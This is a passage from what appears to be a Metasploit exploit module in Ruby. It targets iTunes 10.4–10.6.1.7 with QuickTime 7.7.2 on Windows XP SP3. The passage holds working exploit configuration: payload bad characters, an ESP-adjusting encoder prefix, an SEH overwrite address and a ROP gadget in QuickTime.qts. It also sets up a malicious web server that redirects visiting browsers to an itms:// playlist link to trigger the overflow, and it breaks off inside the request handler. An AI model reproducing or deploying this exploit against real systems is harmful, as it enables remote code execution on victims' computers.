'Platform' => ['win'],
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00\x0a\x0d",
'DisableNops' => true,
'PrependEncoder' => "\x81\xc4\xfc\xfb\xff\xff" # ADD ESP, -0x404
},
'Targets' =>
[
['iTunes 10.4.0.80 to 10.6.1.7 with QuickTime 7.7.2 - Windows XP SP3 EN Professional',
{
'Platform' => 'win',
'Arch' => ARCH_X86,
'SEH' => 0x6693afab, # ADD ESP,0xD40 / ret [QuickTime.qts v7.7.2]
'ROP_NOP' => 0x66801044 # RET
}
]
],
'DefaultTarget' => 0
))
register_options(
[
# IP has to be an reachable address and not 0.0.0.0 as it is used to redirect the browser to itms://<IP>
OptString.new('SRVHOST', [true, "The local host to listen on. This must be an address on the local machine (not 0.0.0.0 !)", ""]),
OptPort.new('SRVPORT', [true, "The local port to listen on", 80]),
OptString.new('URIPATH', [false, "The URI to use for this exploit", "/"]),
],
self.class
)
end
def on_request_uri(cli,request)
# re-generate the payload
return if ((p = regenerate_payload(cli).encoded) == nil)
host = request.headers['HOST']
agent = request.headers['USER-AGENT']
# iTunes browser link
m3u_location = "itms://#{host}/#{rand_text_alphanumeric(8+rand(8))}.m3u"